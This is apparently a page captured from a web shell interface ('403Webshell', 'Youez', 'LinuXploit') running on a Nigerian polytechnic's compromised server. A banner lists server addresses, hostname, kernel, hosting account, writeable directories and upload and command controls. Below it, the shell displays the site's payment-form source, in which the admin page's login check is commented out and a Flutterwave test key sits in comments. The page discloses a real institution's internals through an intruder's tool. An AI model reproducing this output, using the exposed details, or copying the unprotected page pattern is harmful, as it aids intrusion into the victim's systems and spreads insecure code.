403Webshell
Server IP : 172.64.80.1  /  Your IP : 172.71.120.136
Web Server : Apache
System : Linux mail.federalpolyede.edu.ng 5.10.0-32-amd64 #1 SMP Debian 5.10.223-1 (2024-08-10) x86_64
User : federalpolyede.edu.ng_idh35skikv ( 10000)
PHP Version : 7.4.33
Disable Function : opcache_get_status
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/federalpolyede.edu.ng/httpdocs/admin_student/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/vhosts/federalpolyede.edu.ng/httpdocs/admin_student/testFluter.php
<?php
ob_start();
//session_start();
include('headMain2.php');
//die("<h2>Kindly Check back later!</h2>");
/**
 * Created by PhpStorm.
 * User: adisa
 * Date: 3/2/2016
 * Time: 3:31 PM
 */
//session_start();

//if(!isset($_SESSION['matNo'])){
//    header('location:login.php');
//}
//$_SESSION['ptype'] = 'Admission Slip';
?>

<script type="text/javascript" language="javascript" src="../js/jquery-1.7.1.js"></script>
<script type="text/javascript" language="javascript" >

    $(function(){
        $("#idNo").change(function(){
            ($("#idNo").val());

            $.post("../js/getNameNon.php",{idNo:$("#idNo").val()},function(data){
                $("#names").html(data);
            });
        });
    });

    $(function(){
        $("#ptype").change(function(){
            ($("#ptype").val());
            //alert("make sure the amount is "+$("#ptype").val());
            $.post("../js/getAmountc.php",{ptype:$("#ptype").val()},function(data){
                $("#amt2").html(data);
            });

        });
    });

    $(function(){
        $("#ptype").change(function(){
            ($("#ptype").val());
            //alert("make sure the amount is "+$("#ptype").val());

            $.post("../js/getAmountc2.php",{ptype:$("#ptype").val()},function(data){
                $("#amt2c").html(data);
            });

        });
    });


</script>
<div id="wrapper">
    <table width="100%" align="center" cellpadding="3" cellspacing="5">
        <tr>
            <td><fieldset>
                    <form id="form1" name="form1" method="post" action="testFluter_process.php" role="form">
                        <fieldset>
                            <legend>
                                <div class="row">
                                    <div class="col-lg-2"></div>
                                    <div class="col-lg-8">
                                        <div class="panel panel-default">
                                            <div class="panel-heading">
                                                Payment Gateway
                                            </div>
                                            <div class="panel-body">

                                                <div class="row">
                                                    <div class="col-lg-12">
                                                        <form role="form">
                                                            <table width="100%" align="center" >
                                                                <tbody>

                                                                <tr>
                                                                    <td width="40%">ID No (Matric No/Staff No/Tender No.)</td>
                                                                    <td><input name="idNo" type="text" required="required" id="idNo" value="" class="form-control" /></td>

                                                                </tr>
                                                                <tr>
                                                                    <td width="200">Payer Full Name:</td>
                                                                    <td id="names"><input name="payerName" type="text" class="form-control"  size="45" readonly="readonly" id="payerName"></td>
                                                                </tr>
                                                                <tr>
                                                                    <td width="60%">Payer Email: <font
                                                                            color="red">*</font></td>
                                                                    <td><input name="payerEmail" id="payerEmail" required value=""
                                                                               type="email" class="form-control">
                                                                    </td>
                                                                </tr>
                                                                <tr>
                                                                    <td>Payer Phone:</td>
                                                                    <td><input name="payerPhone"
                                                                               type="text" id="payerPhone" class="form-control">
                                                                    </td>
                                                                </tr>
                                                                <tr>
                                                                    <td>Payment Type</td>
                                                                    <td><label for="ptype"></label>
                                                                        <select name="ptype" id="ptype"  class="form-control">
                                                                            <option value="Select Payment Tpe,0,0">Select Payment Tpe</option>
                                                                            <option value="New Transcript Request,5000,2000">New Transcript Request</option>
                                                                            <option value="Reprint Transcript,5000,2000">Reprint Transcript</option>
                                                                            <option value="Development,10000,0">Development</option>
                                                                            <option value="Certificate Levy,2000,1000">Certificate Levy</option>
                                                                            <option value="Lost of School Receipt,1000,0">Lost of School Receipt</option>
                                                                            <option value="Student Association/Club Reg.,1000,0">Student Association/Club Reg.</option>
                                                                            <option value="Verification of result,3500,0">Verification of Result</option>
                                                                            <option value="Re-Notification of Result,2500,0">Re-Notification of Result</option>
                                                                            <option value="Change of Course Fee,5000" style="display: none">Change of Course Levy</option>
                                                                            <!-- <option value="Late Registration Penalty Charges,5000">Late Registration Penalty</option>-->

                                                                            <!--                                                                                <option value="Refund of Cash Advance,0,0">Refund of Cash Advance</option>-->
                                                                            <!--                                                                                <option value="Registration of contractor.,0,0">Registration of contractor</option>-->
                                                                            <option value="Registration of Contractors,0,0">Registration of Contractors</option>

                                                                            <option value="Rentage of Hall,0,0">Rentage of Hall</option>
                                                                            <option value="Sales of Boarded Items,0,0">Hiring of Vehicle</option>
                                                                            <option value="Sales of Boarded Items,0,0">Sales of Boarded Items</option>
                                                                            <option value="Tender Fee,0,0">Tender Fee</option>
                                                                            <option value="Other Payments.,0,0">Other Payments</option>
                                                                            <option value="Capitation,0,0">CAPITATION</option>
                                                                            <option value="Refund of .Cash Advance,0,0">Refund of Cash Advance</option>
                                                                            <option value="Refund of .Turning Advance,0,0">Refund of Turning Advance</option>




                                                                        </select></td>
                                                                </tr>
                                                                <tr>
                                                                    <td width="40%">Payment Description</td>
                                                                    <td><input name="pdis" type="text" required="required" id="pdis" value="" class="form-control" /></td>

                                                                </tr>



                                                                <tr>
                                                                    <td width="200">Amount: <font color="red">*</font></td>
                                                                    <td id="amt2"><input name="amt" value="60000" type="text" required   class="form-control"readonly="readonly" id="amt"></td>
                                                                </tr>
                                                                <tr>
                                                                    <td width="200">Processing Fee: <font color="red">*</font></td>
                                                                    <td id="amt2c"><input name="amtc" type="text" required   class="form-control"readonly="readonly" id="amtc"></td>
                                                                </tr>
                                                                <tr>
                                                                    <td width="200">Payment Method Type:</td>
                                                                    <td>
                                                                        <select class="required-entry form-control"
                                                                                title="Credit Card Type"
                                                                                name="paymenttype" id="paymenttype"
                                                                                autocomplete="off">
                                                                            <option>-- Select Payment Type --
                                                                            </option>
                                                                            <option value="VERVE"> Verve Card
                                                                            </option>
                                                                            <option value="VISA"> Visa</option>
                                                                            <option value="MASTERCARD"> MasterCard
                                                                            </option>
                                                                            <option value="POCKETMONI"> PocketMoni
                                                                            </option>
                                                                            <option value="POS"> POS</option>
                                                                            <option value="ATM"> ATM</option>
                                                                            <option value="BANK_BRANCH">BANK
                                                                                BRANCH
                                                                            </option>
                                                                            <option value="BANK_INTERNET">BANK
                                                                                INTERNET
                                                                            </option>
                                                                            <option value="REMITA_PAY"> Remita
                                                                                Account Transfer
                                                                            </option>
                                                                        </select>
                                                                    </td>
                                                                </tr>

<!--                                                                <tr><td><button type="button" onClick="makePayment()">Pay Now</button></td></tr>-->
                                                                <tr>
                                                                    <td width="200"></td>

                                                                    <td><p></p><input type="submit" name="" value="Pay"
                                                                                      class="btn btn-primary form-control">
                                                                        <img src="../images/remitaLogo.jpg"
                                                                             alt="" width="418" height="90"/></td>
                                                                </tr>
                                                                </tbody>
                                                            </table>
                                                            <div> <a href="reprintNon.php"> Click to check Payment History</a></div>

                                                        </form>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </legend>
                        </fieldset>
                    </form>
                </fieldset>
            </td>
        </tr>
    </table>

    <?php
    include('footMain.php');
    ?>
</div>
<form>

</form>

<!--<script>-->
<!--  function makePayment() {-->
<!--      FlutterwaveCheckout({-->
<!--      public_key: "FLWPUBK_TEST-31d61a13026483fc38f15f0e90232374-X",-->
<!--      tx_ref: "hooli-tx-1920bbtyt",-->
<!--      amount: $("#amt").val(),-->
<!--      currency: "NGN",-->
<!--      country: "NG",-->
<!--      payment_options: "card,mobilemoney,ussd",-->
<!--      customer: {-->
<!--          phone_number: $("#payerPhone").val(),-->
<!--          email: $("#payerEmail").val(),-->
<!---->
<!--        name: $("#payerName").val(),-->
<!--      },-->
<!--      callback: function (data) { // specified callback function-->
<!--          console.log(data);-->
<!--      },-->
<!--      customizations: {-->
<!--          title: "Fed Poly Ede",-->
<!--        description: $("#descr").val(),-->
<!--        logo: "https://assets.piedpiper.com/logo.png",-->
<!--      },-->
<!--    });-->
<!--  }-->
<!--</script>-->

Youez - 2016 - github.com/yon3zu
LinuXploit